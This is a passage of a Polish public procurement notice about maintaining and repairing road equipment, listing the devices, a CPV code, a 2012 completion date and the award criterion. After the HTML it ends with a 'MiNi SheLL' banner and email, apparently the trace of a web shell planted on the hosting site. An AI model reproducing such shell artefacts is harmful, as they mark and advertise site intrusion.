                 bądź w warsztacie Wykonawcy - zgodnie ze złożonym protokołem    
                 przedwykonawczym. 
4. 	Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego, polecenia wykonania naprawy bądź konserwacji sprzętu do wykonania naprawy lub konserwacji w terminie nie dłuższym niż 3 dni robocze.

Sprzęt przewidziany do przeglądu, konserwacji i usuwania awarii:
1.	Wysięgnik FME 500
2.   Głowica Kosząca UMK 1200
3.   Wiertnica EBG
4.   Szczotka myjąca DWB.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com